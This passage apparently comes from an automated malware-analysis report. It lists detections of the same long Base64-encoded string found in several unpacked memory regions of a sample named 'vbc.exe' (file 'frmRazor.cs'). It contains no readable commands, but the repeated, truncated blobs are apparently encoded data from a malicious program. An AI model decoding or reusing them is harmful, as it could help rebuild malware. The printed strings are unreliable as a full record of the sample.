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
              Source: 4.0.vbc.exe.cf0000.0.unpack, frmRazor.csBase64 encoded string: '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
              Source: 5.0.vbc.exe.cf0000.0.unpack, frmRazor.csBase64 encoded string: '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
              Source: 5.2.vbc.exe.cf0000.0.unpack, frmRazor.csBase64 encoded string: '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
              Source: 6.0.vbc.exe.cf0000.0.unpack, frmRazor.csBase64 encoded string: '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
              Source: 6.2.vbc.exe.cf0000.4.unpack, frmRazor.csBase64 encoded string: 'GIdDNNZNNNNRNNNN//8NNYtNNNNNNNNNDNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNtNNNNN4sht4NgNaAVotOGZ0uITucplOjpz9apzSgVTAuoz5iqPOvMFOlqJ4tnJ4tER9GVT1iMTHhQD0XWNNNNNNNNNODEDNNGNRQNViu868NNNNNNNNNNBNNNvRYNINNNPNNNNNTNNNNNNNNlw8NNNNtNNNNDNNNNNNNRDNtNNNNNtNNONNNNNNNNNNRNNNNNNNNNNPNNNNNNtNNNNNNNNZNDVHNNONNNONNNNNNRNNNRNNNNNNNNONNNNNNNNNNNNNNNUt/NNOCNNNNNRNNNBDQNNNNNNNNNNNNNNNNNNNNNNNNNTNNNNjNNNOpCjNNUNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNVNNNPNNNNNNNNNNNNNNNPPNNNRtNNNNNNNNNNNNNNP50MKu0NNNN0O8NNNNtNNNNVNNNNNVNNNNNNNNNNNNNNNNNNPNNNTNhpaAlLjNNNBDQNNNNDNNNNNDNNNNvNNNNNNNNNNNNNNNNNNONNNONYaWyoT9wNNNZNNNNNTNNNNNPNNNNWtNNNNNNNNNNNNNNNNNNDNNNDtNNNNNNNNNNNNNNNNNNNNPfCjNNNNNNNRtNNNNPNNHNhPHNNBjLNNNQNNNNNNNNNXD+NNP4NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNO4PXOLNNNbdWtNPXOpNNNbNXdMmTNNNPbNONNNRpkxNNNdNNtNNOUZnNNNXtNZNNNEmTjNNPbNRNNNRXuZjNDNDNNNNNDNNRDO+NDNNOT8pNNNXPvfNOvbGZNRNRNNNNNVNNORNstVNNNEiUDNNPtbeNNLdRmNONONNNNNQNNNENU4QNNNRok4NNNbXXjNTXuZjNDNDNNNNONNNRDO+ONNNOT8sNNNXPvfNOvbGZNVNCNNNNNHNNORNstHNNNDHXPNNNNbYOljuptRNNUQDODNNNvtuNNNXolVNNNcmVjNNPtjVtNHNNNDNNU4SNNNRPvfNOvbGZNRNPjNNNNLNNORNstLNNNDXXjNTXvVNNbNTNNNRXyMmQNNNOvtxNNNXqNLNNNXNOjNNOPbrNvtyNNNXXtNNRmNONNfNNNNUNNNENU4UNNNRPvfNO